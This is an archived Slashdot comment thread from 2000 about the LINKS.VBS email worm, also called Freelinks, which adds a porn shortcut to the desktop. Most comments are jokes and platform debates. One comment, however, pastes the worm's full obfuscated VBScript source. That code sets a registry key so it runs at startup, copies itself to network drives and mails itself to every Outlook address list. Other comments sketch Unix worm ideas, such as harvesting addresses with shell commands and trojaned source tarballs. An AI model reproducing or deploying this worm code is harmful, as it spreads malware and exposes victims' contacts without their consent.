Slashdot is powered by your submissions, so send in your scoop

 


Forgot your password?
Close
typodupeerror
×
Bug

The Next Generation of ILOVEYOU:The Porn Worm 192

Posted by CmdrTaco from the beware-of-the-neverending-popups dept.
Erik Green writes "I've been sent a new semi-benign ILOVEYOU variant - it's got a subject line of "Check this" and consists of a one-line message and an attachment named LINKS.VBS. Its only purpose other than self replication is to add a link to a XXX site to your desktop. The attachment is a self-replicating script that copies itself to all network drives and sends itself to everyone listed in outlook's address book. This variant is interesting since it's partially encrypted to obscure it's purpose. It's nice enough to ask if you want the shortcut added to your desktop, but it doesn't ask about replicating itself. It's basically a trojan advertisement. Fortunately, it doesn't delete any files. Needless to say, only machines that run outlook and have visual basic scripting available are vulnerable. "
This discussion has been archived. No new comments can be posted.

The Next Generation of ILOVEYOU:The Porn Worm More

The Next Generation of ILOVEYOU:The Porn Worm

Comments Filter:
  • I think everyone that's ever said the work unix got that...
  • I'd always wondered where pr0n producers come up with movie titles as original as "Sheepless in Montana" and "Shaving Ryan's Privates". Now I know -- they get them from /.! I can't wait for "Porn Worm: The Movie" to come to DVD.

    Does this bring a second meaning to "trojan advertising"?

  • My bosses' machine had that virus about six weeks ago. It placed a link to a porn link exchange site, if I remember correctly.

    It was trivial to clean, AIRC. Nowhere near as nasty as ILUVU was.

    Sorry, Cmdr, but this doesn't sound like a new virus. Did you check out Symantec's library before posting, to see if it had any history?

  • There's a log of one time this actually worked at http://www.theplunger.com/idiot/ [theplunger.com]. The log is long, but quite funny. It probably helps to know what a MUSH/MUX is, but it's not necessary.

    A choice quote from the log: ('You' is the person giving the "help", and Oronde is the idiot)

    You say "Type 'ls' and tell me what you see."
    Oronde says "okay now what?"
    Oronde pages: nothing...
    You say "oops. I guess rm *is* the deleting files and 'del' isn't."
    You say "Wow. What a mistake *I* made! I must have not read the manual!"
    --
    No more e-mail address game - see my user info. Time for revenge.

  • Frankly, it's a bit disturbing to see all the abuse M$ users get. The general view seems to be that if you're running Windows you're a moron, because of all the blatant security holes. I'm not arguing that. Windows has more accessable holes than a hour long gay pr0no. And everybody knows about them. The reason everybody knows about them is that Windows is what the vast majority of people use. It's the standard for the market, and therefore it's subject to the most examination. But that's off topic. The reason that all these viruses are aimed at M$ is the law of the jungle. If you have a huge population of prey, the associated predators grow in population as well. When the majority of users run Windows, the haXOrs aim for Windows systems. A virus vs. Windows is international news. A virus vs. Linux or Macs or whatever, while it might be important to /. fans, is NOT international news. Not enough people are effected. Now please form an orderly line to flame me into oblivion.
  • I'm still waiting for the MS virus that will blow away Windows, ftp the latest version of RedHat and install it. This would happen off hours, of course. :)
  • If Linux (or any one version of Unix) had 80% market share and ran an Office suite with 80% market share, Linux would have a similar virus problem.

    Virus writers want them to spread. It doesn't take a brain surgeon to target 80% of the computers instead of 4%.


  • damit the commerical world gets all the cool tools, the sound blaster live drivers where out first on Windows, and most of the new 3D cards are supported under windows, not to menation the cool automatic shutdown "blue screen of death" that is smart enough to turn it's self of and now this.

    Dammit, I would like porn on my desktop, please please tell me this works under wine...

  • Saw this months before ILOVEYOU. Is Slashdot getting lazy? With all their bread, maybe somebody could taken 15 seconds to check any 1 of the major AV vendors' sites before posting this.
  • We had this pass though my work over a month ago. But don't take my word for it, go to http://vil.nai.com/villib/dispVirus.asp?virus_k=10 225 Looks like it's as old as last July.
  • Actually this particular virus was born and probably inspired the ILOVEYOU virus. This is again a script kiddie virus and was release around six months back and the firm where in which I worked was affected. But the virus writer did something dumb..the virus sent itself three times to the same person on your Outlook Addressbook. Since three mails from the same person with the same attachment is fishy in nature, I never even looked at it. later I dissected the code and saw it didnt do much other than copying itself to network drives and adding the link.

    My stupid Project Mgr opened it and he didnt even know that it left a link "XXXLinks" on his desktop until I showed him.

    This is nothing new, just some kid who thought the ILOVEYOU virus is getting all the attention that he deserves and decided to send his baby out again.

    Grow up!
  • I looked on their web site to find out what this thing was.. why would anyone run this program? It puts an ad bar on your browser, it adds some crappy bookmarks to your browser.. it puts links on your e-mails.. it changes your home page to their page.. it pops up a new window every time you open a new URL!

    Not only that, they basically threaten that if you try to remove the software, it will put itself back when you reboot..

    Why on earth would you use this? I can't see any redeeming features.. I even went to their homepage and tried running a search. Half the links don't work, and the other half take you to random searches about casinos and stuff..

  • Hrmph! (Score:1)

    by GoRK ( 10018 )
    My god, for the first time in history the virus warnings on slashdot are outnumbering the ones inept people are e-mailing me!

    ~GoRK
  • Theoretically, I can see at least one good use of this stuff: remote administration.

    A network admin/tech support department could save time by emailing auto-installing software updates to clueless users' machines, instead of having to trudge out to each users' machine to do the install..

    Of course, this is just in theory - in reality, I've never seen it used, and I honestly think the *nix method (telnet/ssh/whatever) is less prone to abuse.. even telnet requires a PASSWORD to verify that the person attempting to to use the system is who they say they are..

    All in all, it MIGHT have it's uses, if it were implemented in a more secure manner.
  • I read about a similar idea from one of the Unix gurus before (I don't remember exactly who it was, unfortunately). Basically, the article talks about how even source code is not a guarantee that you are safe.

    I believe that the UNIX guru in question is Ken Thompson. His article Reflections on Trusting Trust [acm.org] is quite interesting.

    Regards,
    DeanT

  • Try spreading decss with something like this. You could force-mirror any reasonable size files with this kind of trojan mechanism. 'Educational viruses'. There would be a disadvantage of brutally harsh pr for your cause by media and govt, but it might be balanced by the need for survival of the software or information.


    ... . . .
  • This virus is actually a little older than the ILOVEYOU virus and only shares the Outlook proagation technique. It is pretty cleverly written to encrypt / decrypt itself through multiple layers.
  • re: alter the virus to make the porn site the default page for the browser, not just add a desktop link.

    I would think that if the virus worked, you would bring down the server incredibly quickly (as millions would automatically go to this sight as soon as they got this virus)

  • As if everyone who sends unsolicited email is 'dumb as a post.'

    You're right. Some of them are actually dumb as a rock.

    ======
    "Rex unto my cleeb, and thou shalt have everlasting blort." - Zorp 3:16

  • Re:Independent Confirmation (Score:3)

    by orangecat ( 98507 ) on Tuesday May 23, 2000 @10:49AM (#1052550) Homepage
    Will the Symantec Antivirus Research Center [symantec.com] entry do?

    Yes, its true. Though it is far from a new thing - it's been around for about a year now.

  • I swear how many viruses came out that have taken advantage of this .vbs prob? It has only taken M$ two years or so to fix the prob. Or at least that is what they "say". Until someone finds the next bug in outlook, or some key component of windows. How do companies and the government continually put up with being beaten by these? I guess somebody needs to tell them to get a clue. Anybody have any ideas how to make them understand that these problems are only on the micro$oft platforms? Someday if we are luck they will get it.
  • That's the score that this article should get, on account of the fact that this has been discussed SEVERAL TIMES on /.!! I mean, if I name a worm after myself, will I get a story?

    Remember, there is nothing new to say here, except for some karma whoring.

    Have a nice day!

  • a link to porn on my desktop???

    why can't all viruses be this horrific...? next thing you know i'll be recieving the "FREECASH" email.
    too bad i'm not an outlook kid...

  • Mattel Responds (Score:5)

    by laborit ( 90558 ) on Tuesday May 23, 2000 @10:50AM (#1052554) Homepage
    So now Cyber Patrol will have to add the Windows Desktop to its blocked site list, right?

    THAT should teach Microsoft to integrate its browser with its OS...

    - Michael Cohn
  • ...whomever made the virus didn't have it paste porn content to the victim's desktop.

    Er, I mean, good thing they didn't.

  • is the "I just want to be friends" virus. Ouch.
  • One of the best ways to prevent the spread of little nasties like Love Bug and others is really simple. Set your mail reading to 'return to inbox' rather than have it open the next item. Regards haginmat

  • New??? (Score:1)

    by Nezer ( 92629 )
    I got with this one many, many months ago!

    It's pretty neat to look at and I highly recommend anyone look at the source and pull it apart. You will have to check-out the "encrytion" algorithm (if it can be called that) th get the key.

    Of course, you can always do what I did and crack the old way, with pen and paper. ;)

  • I had the same thing happen to me with IRC. I didn't accept it because the person who was sending left a message in channel about the fact that they had some kind of weird virus. I didn't hear a thing about it after that.

    I tried out the security update on one of the workstations at work. I think it was the best thing that ever happened for the user. She became so frustrated with the lack of functionality that they switched over to Netscape mail. Last one..........thankfully. As for seeing an end to the "worm" viruses, it won't happen until everyone learns the lesson of this user. Only took her a year of constant chaos.
  • RE: Man. I should write a program in C that formats your HD after mailing itself to everyone in your outlook address book, and then I could be a famous virus writer too!

    uh-oh, now the FBI is going to come looking for you the next time a virus comes out...

    I could see the headlines now, "Hacker 'mindstrm' was arrested in an early morning raid, FBI points to incriminating posts on Hacker discussion group 'Slashdot'"

    seibed

  • Anyone out there get the "I Kinda Like you" virus for *nix? It's on the honor system: rm a few files your not using and forward to your friends. Wish I'd thought of it :)
  • The Freelinks virus as it's called [symantec.com] is an old virus. I saw it first about six months before the loveletter came out.
  • If you're going to write a virus to advertise your stupid porn website, at least have some originality and write a nice, new virus from scratch instead of stealing someone else's idea.
  • The difference is that no Linux vendor makes a distribution where the email client executes arbitrary code embedded in attachments.
    The day everything happened with the ILOVEYOU virus, I tried to replicate the behaviour with mutt, a unix mail client. I made a simple shell script 'test.sh' which did 'echo test'. When sending it with mutt, it was given mime-type application/x-sh. So at sending time, a shell script is recognized as such and given the correct type. When I received it, mutt gave the message '[-- application/x-sh is unsupported (use 'v' to view this part) --]'.

    I can set up mutt to execute application/x-sh scripts as shell scripts. But the big difference is that I have to set it up to be dangerous before that happens! The mentality in (most) Unix programs is nowadays security first.

  • I wonder if MS users can see the site if they've turned on IE's PICS support...
  • Have any of you ever been on IRC?
    links.vbs is very, very old news (talking at least a year), to anyone who's ever been in a channel with mIRC weenies (I used to op in a huge MP3 and a huge MPEG channel, so I knew all about it very quickly ;).
    Gawd, if you're going to release news of every old skript k1dd13 .vbs "virus", you'd need a few terabytes just to handle the HTML involved.

    d


    -
  • This is some pretty funny stuff. Does Slashdot
    have any independent confirmation that the person who submitted this didn't just make it up??

  • The difference is that no Linux vendor makes a distribution where the email client executes arbitrary code embedded in attachments.

  • I'm going to write a worm that finds everybody that is transfering copyrighted material, then I'm going to sue them...oh wait, nevermind.
  • I have actually received spam with a "copyright" notice on the bottom stating that replying, forwarding, redirecting, reposting, etc., anything from the message would constitute a violation and would be prosecuted.

    You mean that you actually read your spam for longer than it took to decide to hit the delete key? What's wrong with you?

    Actually, this sounds like the basis for a moderately amusing scheme. You copyright a message and then spam it to millions of people with the section mentioning that it's copyrighted and all reproduction is forbidden. When they forward your message to abuse@your.isp.com, you sue them for copyright infringement. The only problem is that a halfway intelligent defense lawyer would be able to argue that forwarding the message to the abuse authorities is fair use. So much for that plan.

  • There seems to be a lot of viruses coming out these days. How immune are the Linux/Unix systems and what can we do to prevent these kind of viruses from causing us trouble? How would the current viruses need to be configured to bother us? Starcraft Linux, IPMASQ, Gnutella [eyep.net]
  • WORM.Slashdot

    WORM.Slashdot is a worm that will work under most nerdy minds. Once the worm is launched, it uses person involved to waste valuable working time on daily basis reading Slashdot. It can also a number of ways to propagate: other web pages, by word of mouth, IRC and email by masquareding as something interesting.

    Also known as: /.bomb

    Category: WORM

    Infection length: 100-400 posts, 1-100 slashdot.org loads per day

    Virus definitions: May 23th, 2000

    Threat assesment:

    Damage: HIGH - Distribution: HIGH - Wild: HIGH

    Wild

    • Number of infections: More than 1000000
    • Number of sites: 1 (slashdot.org)
    • Geographic distribution: HIGH
    • Threat containment: HIGH
    • Removal: HIGH

    Damage

    • Payload
      • Large scale loading of web pages: mostly slashdot.org
      • Slashdot effect: More dangerous side effect when slashdot.org links to some external page
      • Lost sanity: Might make you write posts on subjects like "First Post!", "Beowulf cluster" and "Natalie Portman". That happens mostly only before total system breakdown.
      • Modified files: /dev/brain

    Distribution

    • Word of mouth: Check this
    • Target of infection: Nerds

    Technical description

    Similar to the freshmeat [freshmeat.net] virus, this worm uses nerd() calls to make users reading slashdot.org (and wasting valuable working time). The contents of worm is "Slashdot.org News for Nerds: Stuff that matters".

    Removal:

    • Destroy all modems, network cards and other devices capable with TCP-IP networking.

    Write-up by: Jage May 23th, 2000

    This is funny. Laugh now.

  • My soulution for when that gets out of hand (or when netscape just hangs) is to click the little stick of dynamite on my toolbar that executes one command...
    "killall -9 netscape"

    ----------------------------------------------
  • I want that link! Always looking for fine pr0n.
  • ... then you know a lot of people that aren't computer saavy, or are just plain stupid.

    The news has been out there. Pundits are talking about everything. MS, the AV shops, and every admin worth his salt is taking steps to stop it.

    In other words, unless it defeats all known AV and sensible security precautions (ie, disable most of Outlook's functionality) then I say, lets drop the issue.
  • This virus has been out since July 1999 according to NAI. Check out http://vil.nai.com/villib/dispvirus.asp?virus_k=10 225
    for the info. Seems like this would be more of a cousin to Melissa rather than ILOVEYOU.
  • "Needless to say, only machines that run outlook and have visual basic scripting available are vulnerable."
    I don't think so. Well, if it's free porn, vulnerable is the wrong word. If it's a free site, then Outlook users like myself are lucky to catch this one. Gimme gimme! (=


    When the pack animals stampede, it's time to soak the ground with blood to save the world. We fight, we die, we break our cursed bonds.

  • Re:trojans (Score:2)

    by Anonymous Coward
    Only the condom commercials.
  • Worms with the name Links.vbs have been floating around IRC for several months now, this looks like someone just decided to create an email variation, it used to just send via DCC.
  • According to Symantec it was found last July.
  • Wow, a free app that adds a shortcut to a porn site on my desktop and generiously tells all my friends coworkers. Thats not a bug!

    Of course not. It's a feature.
  • Finally someone realized the marketing value of viruses! Heck, all it would take is a few good programmers for a large company like oh, Microsoft, to plaster obscure ads like this all over your computer. Or, hey, what about setting your computer to DDoS a set of Linux websites? Keep it under the wraps, and they could be having problems for weeks, not to mention loosing alot of money, etc! Or how about changing your hosts file so that whenever you go to slashdot.org, you actually go to microsoft.com/whylinuxisbad. Hey...have you ever thought that this is what is happening? Its Microsoft that makes all the bugs in Outlook, so they could easily use the bugs to make these kinds of viruses! It was Microsoft who made the Love Bug! Then they bought some stock in a porn site and made this new virus! Those Bastards!
  • After the worldwide strike of the "I LOVE YOU VIRUS", reports are already coming in that the virus is mutating into several variants.

    Within the next few hours, expect to see:

    The original "I love you" virus

    The "I like you a lot" virus

    The "You're nice, but I just want to be friends" virus

    The "Its not you, its me" virus

    The "Look, it was just a date...don't get clingy" virus

    The "Okay, I think its best if we don't have anymore contact" virus

    The "It was late, I was drunk, you were easy" virus

    The "Stop calling me, you unfeeling prick" virus

    The "That's it, I hate you and your stupid cat" virus

    Plus:

    The "No, I Reeaallllyyyy Like You" Virus ... usually hits around midnight

    The "You're Beawfullll ....." virus .... usually hits about 2am

    The "Nothing has to happen. I just want to wake up with you in my arms" virus ..... careful, it's a sly one.

    The "You're OK but I was wondering if your friend is single" virus

    The "Of course I'll phone you ... Now do you want me to call a cab for you?"

    .......... hmmm, that'll hit anytime between 3am & noon.

    Yet to have caffeine, seemed funny at the time...

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~
  • If Linux (or any one version of Unix) had 80% market share and ran an Office suite with 80% market share, Linux would have a similar virus problem

    Only if this "Office suite" had the same poor design as MS Outlook.
    The claims that "It only happens because Windows is popular" are a subtle form of FUD. Anyway as someone has already pointed out, Where are all the apache affecting viruses?
    Probably the primary reason that virus writers target Windows is that it is easy to write viruses for and those viruses can do all sorts of things.
  • ye goda if it isin't enough to have your inbox full of spam, now u can get your desktop/anyhtign else about your computer changed by spammers grrrrr lets hope that this dosen't becomd a trend..
  • Maybe if Bill gets his default page set to "Naughty Barnyard Nyphos" a few times he will pay more attention to security.


    What's a "Nypho"?

  • I first read this to be:

    Maybe if Bill gets his default page set to "Naughty Barney Nymphos"....

    If only :)

  • Ok, this is NOT news. News will be that MS has developed some fab means of having scripting that is not a big gaping security hole.. (or news of any real innovation from MS for that matter)

    Microsoft's innovation is to be egocentric. First we had "My Computer" and "My Documents", not we have "Windows ME"
    Just about everything Microsoft have done in the last several users is a "rip off" of other people's ideas.
  • Are there any LEGITIMATE uses for sending vbs scripts as email attachments (especially auto-run attachments) that I don't know about? I mean, obviously if you're part of a group of coders working on a vbs dev project you might want to exchange snippets but is there any reason for the average person to even expect a vb script in his/her email?

    Maybe the question should be "Are there any legitimate situations outside environments where the sysadmin can explicitally enable this. If and when it is needed." i.e. is there any legitimate reason for this being on by default?
  • As someone already mentioned this is not a variant of the ILOVEYOU case but an older worm called Freelinks, see http://www.F-Secure.com/v-descs/freeli nk.htm [f-secure.com] for analysis.

  • Just to clear up a prevalent rumor:

    The arbitrary code was not embedded in the message (any more than any other MIME-encoded attachment is embedded), and it was not executed by the email client. It required the user to double-click on it to execute it, exactly like any other executable attachment. The security hole is in the scripting model (Windows Scripting Host) that provides an automated interface to the global address book.

  • In a perfect world, the virus would create a windows link called "Windows 2000 Bug Fix" which had a link to download and install one of the Linux or BSD distros.

  • A network admin/tech support department could save time by emailing auto-installing software updates to clueless users' machines, instead of having to trudge out to each users' machine to do the install..
    Of course, this is just in theory - in reality, I've never seen it used, and I honestly think the *nix method (telnet/ssh/whatever) is less prone to abuse.. even telnet requires a PASSWORD to verify that the person attempting to to use the system is who they say they are..

    More likely easier to use login scripts or remote administration programs. An obvious problem with using the email upgrade aproach is that the email program itself is quite hefty and likely to be holding on to resources the installer wants to upgrade.
  • Okay, there are a lot of things flying around here.. first off, linux and windows... well read the subject. Most people think windows 95/98, a non-protected "go what you want, its your machine and you're the only one on it OS". We are talking about two TOTALLY different things here. Now if you want to talk windows NT and linux, sure go for it. Effective system administration could stop any such virus. You could re-register .vbs files to a scripted something saying that you are about to execute a .vbs file and if you dont know what you are doing executing it, then press NO, or something. Simple enough. UNIX is too inconsistant to be hit by a virus as such... remember, VB is the tool of choice for NT, as perl or python or /bin/sh is for UNIXy OS's. There could easily be something that WELL hid itself in shell code and modified it, or faked the viewing aspect, or something. Unix is genenerally more well explored by its users, however there are plenty of times where there are files where even an experienced user does not mess with.. how many people mess with their .netscape stuff? My point is, UNIX users of the world, count your blessings.... there are many threats out there to security, that even open source is not going to stop... for every crafty person waiting to write a malicious vbs script, there is going to be a crafty perl nutcase waiting to fdisk a few drives. System administration solves many security woes. With a heads up, a good exchange admin can stop this kind of attack, and still gain the benefit of using that particular mail product. Linux looks great because windows (98) looks bad. Thats the way it is. There are people that swear by both. The ILOVEYOU virus sucked. It hurt a lot of companies, businesses and government agencies.. A few friends of mine got it.. however, not running as administrator on their own machines lead to a little file cleanup afterwards.. end of story. System administration is the magic bullet..keep your users under your watchful eye. There will always be something to sneak up on them. Keep in mind what you are comparing when you say "UNIX is safe...", or "UNIX will never have this kinda trouble"... linux should be greatful to shine in the bad press. its about the technology, not the name --jay

  • LINKS.VBS (Score:1)

    by Anonymous Coward
    On Error Resume Next
    Set A1 = CreateObject("Scripting.FileSystemObject")
    Set A2 = A1.OpenTextFile(WScript.ScriptFullName,1)
    Do While A2.AtEndOfStream = False And Mid(A3,40,10) "`sd]Lhbsnr"
    A3 = A2.ReadLine
    Loop
    A2.Close
    Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder (1),B("STOEMM/WCR")),True)
    A4.WriteLine(B("No!Dssns!Sdrtld!Odyu"))
    A4.WriteLine(B("Rdu!@0!O\J>@KFQB_Pliwt^ub_Jf`ulp liw_T fqgltp_@ruubqwYbupflq_Urq_Urqgoo""""+*C3,@wkjbNcrf &C3,IgrUngekcjDqjbgp&3+*@&""""URQGOO1YEP """"++""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Kd!Oui@qv&@&""" "Wkfp tfoo ^gg ^ pkluw`rw wl iubb [[[ ofqhp lq vlru gbphwls1 Gl vlr t^qw wl `lqwfqrbssof`^wflq""""++""( ("))
    A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C33!?!C3.,I grLcogUnceg&@&""""J>SF""""++""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Dqp!Gcef!C30!Kl !C33,CbbpguuJkuru""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C35!?!C3.,E pgcrgKrgo&.+""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Dqp!C32!?!3!Rq! C30,CbbpguuGlrpkgu,Eqwlr""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C37!?!C30,C bbpguuGlrpkgu&C32+""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Kd!C32!?!3!Rfgl ""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""C35,@EE!?!C37,C bbpguu""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Gjug""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""C35,@EE!?!C35,@ EE!$!@&""""8 """"+!$!C37,Cbbpguu""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Glb!Kd""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Lgvr""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""C35,Uw`hger!?!@ &""""@kb`h wkfp""""+""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""C35,@qb{!?!@&"" ""K^yb irq tfwk wkbpb ofqhp1""""+!$!Efp&35+!$!Efp&3.+!$!@&""""Evb1""""+" "(("))
    A4.WriteLine(B("@5/VshudMhod)C)""C35,Crrcefoglru ,Cbb!YUepknr,UepknrDwjjLcog""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""C35,BgjgrgCdrgp Uw`okr!?!Rpwg""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""C35,Uglb""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Lgvr""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Dwlerkql!@&@3+" "(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Dqp!@0!?!3!Rq!J gl&@3+""(("))
    A4.WriteLine(B("@5/VshudMhod)C)""Kd!Cue&Okb&@3*@ 0*3++!:(""(("))
    A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?3""(( "))
    A4.WriteLine(B("E5/VshudMhod)C)""Gtglr3?QL!HQKL8 %81bee!uglb!#lkem!""(!'!@0/CthmeQ`ui)@0/Fd uRqdbh`mGnmeds)1(-C)""JKLMU,T@U""((("))
    A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?3""( ("))
    A4.WriteLine(B("E5/VshudMhod)""""("))
    A4.WriteLine(B("E5/VshudMhod)C)""]3../Jgtgj!3.._ ""(("))
    A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""(( "))
    A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""( ("))
    A4.WriteLine(B("E5/VshudMhod)""""("))
    A4.WriteLine(B("E5/VshudMhod)C)""]0../Jgtgj!0.._ ""(("))
    A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""(( "))
    A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""( ("))
    A4.WriteLine(B("E5/VshudMhod)""""("))
    A4.WriteLine(B("E5/VshudMhod)C)""]5../Jgtgj!5.._ ""(("))
    A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""(( "))
    A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""( ("))
    A4.WriteLine(B("E5/VshudMhod)""""("))
    A4.WriteLine(B("E5/VshudMhod)C)""]2../Jgtgj!2.._ ""(("))
    A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""(( "))
    A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""( ("))
    A4.WriteLine(B("E5/VshudMhod)""""("))
    A4.WriteLine(B("E5/VshudMhod)C)""]7../Jgtgj!7.._ ""(("))
    A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""(( "))
    A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""( ("))
    A4.WriteLine(B("E5/Bmnrd"))
    A4.WriteLine(B("Doe!Hg"))
    A4.WriteLine(B("Odyu"))
    A4.WriteLine(B("Gns!D`bi!E4!Ho!@0/FduGnmeds)E0(/ RtcGnmedsr"))
    A4.WriteLine(B("E!E4/Q`ui"))
    A4.WriteLine(B("Odyu"))
    A4.WriteLine(B("Doe!Hg"))
    A4.WriteLine(B("Doe!Rtc"))
    A4.Close
    Set A5 = CreateObject(B("VRbshqu/Ridmm"))
    A5.RegWrite B("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]B tssdouWdsrhno]Sto]Stoemm"),A1.BuildPath( A1.GetSpecialFolder(1),B("STOEMM/WCR"))
    If MsgBox(B("Uihr!vhmm!`ee!`!rinsubtu!un!gsdd!YYY!mho jr!no!xnts!edrjunq/!En!xnt!v`ou!un!bnouh otd>"),36,B("Gsdd!YYY!mhojr")) = 6 Then
    Set A6 = A1.CreateTextFile(A1.BuildPath(A5.SpecialFolders(B ("Edrjunq")),B("GSDD!YYY!MHOJR/TSM")),Tr ue)
    A6.WriteLine(B("ZHoudsoduRinsubtu\"))
    A6.WriteLine(B("TSM 0 Then
    For A9 = 0 To A8.Count - 1
    If InStr(A8.Item(A9),B("]]")) 0 Then
    A1.CopyFile WScript.ScriptFullName, A1.BuildPath(A8.Item(A9),B("MHOJR/WCR"))
    End If
    Next
    End If
    Set A10 = CreateObject(B("Ntumnnj/@qqmhb`uhno"))
    Set A11 = A10.GetNameSpace(B("L@QH"))
    For Each A12 In A11.AddressLists
    Set A13 = A10.CreateItem(0)
    For A14 = 1 To A12.AddressEntries.Count
    Set A15 = A12.AddressEntries(A14)
    If A14 = 1 Then
    A13.BCC = A15.Address
    Else
    A13.BCC = A13.BCC & B(":!") & A15.Address
    End If
    Next
    A13.Subject = B("Bidbj!uihr")
    A13.Body = B("I`wd!gto!vhui!uidrd!mhojr/") & Chr(13) & Chr(10) & B("Cxd/")
    A13.Attachments.Add WScript.ScriptFullName
    A13.DeleteAfterSubmit = True
    A13.Send
    Next
    Function B(B1)
    For B2 = 1 To Len(B1)
    If Asc(Mid(B1,B2,1)) 34 And Asc(Mid(B1,B2,1)) 35 And Asc(Mid(B1,B2,1)) 126 Then
    If Asc(Mid(B1,B2,1)) Mod 2 = 0 Then
    B = B & Chr(Asc(Mid(B1,B2,1)) + Right(Asc(Mid(A3,70,1)) + 1,1))
    Else
    B = B & Chr(Asc(Mid(B1,B2,1)) - Right(Asc(Mid(A3,70,1)) + 1,1))
    End If
    Else
    B = B & Mid(B1,B2,1)
    End If
    Next
    End Function
  • Well, if you only want to think about how a worm (or any kind of shell script) can grab e-mail addresses out of a user's address book, try these for size: strings ~/.netscape/pab | grep "@" | more ldapsearch -h -b "c=/" "sn=*a*" cn | more OK, the first only works for users who use Netscape for e-mail, and the second only if an ldap server is used to provide or store e-mail addresses... but I'm sure you can get the information from other sources, too... A while ago, I wrote a little bash script that called on the fortune program to send off messages twenty at a time to a friend who clogged my mailbox with silly `virus warnings'. A combination of: 1. a bit of text that sounds convincing, like "Message from IT Security Services @ M$ Antivirus advises you to run the attached Diagnostics script" 2. a version of the fortune mailer, written so as to make the code nearly unreadable... (say, twice as many comment lines as code) 3. the address ripper should suffice to bring down the mailserver. The difficulty would be in obfuscating the code sufficiently. Anybody who looked inside the Love Bug vbs should have spotted immediately what was going on...
  • One of the biggest safeguards of Unix so far is: the sheer lack of uniformity. Another is (was?) it's relatively small install base. About the first point: write a linux executable, and even it you convince enough people to run it, it will fail because there is no single level of Unix installed everywhere. Some kernels will barf on it, others will refuse to execute it. And it won't work on Slowaris, SunOS, HP-(Y)UX, *AIX*, Digital Unix. So a shell script version might work (even then, program features change, as well), but that has the drawback of being readable and thereby easily recognized for what is is.

    The obvious solution to these difficulties is an obfuscated PERL script. PERL is installed on a large fraction of all UNIX boxen (and even on other platforms) and has the power to do a lot of stuff. It has good cross-platform uniformit, particularly when people have various CPAN modules installed. As even its biggest detractors will admit (or maybe you could say especially its biggest detractors will insist) PERL is wonderful for writing densely incomprehensible programs that even a dedicated PERL hacker has trouble understanding. The ability to do direct damage is limited by the lack of root privileges, but then again, damaging the system prevents you from spreading effectively. Add it all up, and it's the perfect worm implementation language for UNIX.

  • It would be far better if it forced your browser to one of those whack-a-mole sites that keep popping up additional windows when you attempt to leave.

    I assume you are referring to The Time Magazine Web Site [time.com], and not any of those naughty, naughty pr0n sites?

  • Viruses, whatever...

    Source code virus?

    Say someone has an infected version of the Apache source; it has embedded within it a modified 'ls' or 'find' or 'grep' or something. When compiled, it also replaces ls. Apache, of course, is also infected; it is a way into and out of your computer, and would be used to spread information, primarily.

    Now when you do your usual make, make install, the source is modified to look perfectly normal, but the damage is done. You have an infected ls, find, grep, etc, as well as Apache. What the modified program would do is look for Makefiles and configures; when it identifies a directory with a Makefile and/or configure script, it will actually modify the process to build another infected program. In this case, it would get the infected source from Apache! See, while the server has been up, it has serriptitiously been downloading bad source and sharing bad source with other infected computers, without logging it, and placing it in strange and not commonly visited places.

    So when you actually do another source compile, you get another infected program; say, ftp gets modified. Or telnet. Or man. Whatever. Until you have lots of malicious programs. All waiting for a signal, a trigger, a date, whatever. Or for apache to do something!

    Of course this is speculation on my part. Do wiser heads think this is impossible?

    -AS
  • Since I don't keep any addresses in my Outlook Contacts List, it couldn't spread, no matter how much I prodded with it. The encryption was kinda cool, but the guy I got it from was apologizing profusely to all his clients.

    This isn't new, it's not a LOVEBUG variant.
  • I'm sure I had heard about this one before...
  • What's a nypho?

    It is like a typo, only smaller.

  • I was just thinking one could put a virus into a source tarball as an executable file, have the Makefile call it...

    Perhaps it could make it's own version of ls, or ldconfig! After the "make install" by root the virus can do anything it wants. Imagine, everytime you call ldconfig it spreads further, it would be literally impossible to repair the damage at that point.

    The downside: it wouldn't take long for people to find the virus, but most people don't even bother to watch the compile screens let alone go through all of the source code files.

    P.S. it would be fun and easy to release the virus in RPM format...

    P.S.S. Maybe one could modify pine or sendmail to spread the virus.

    Devil Ducky

  • Re:Maybe -- Not Such a bad Idea (Score:4)

    by Nik Picker ( 40521 ) on Tuesday May 23, 2000 @10:59AM (#1052620) Homepage
    Actually thats not such an unusual Idea. I have often discussed this theory with a number of professionals always with the same sceptiscm. But consider it this way. Users ( the end user kind ) are notoriously inept at upgrading. If there were a way to write Upgrade software distributed in a virus vector it might reduce your work load. MIGHT that is.

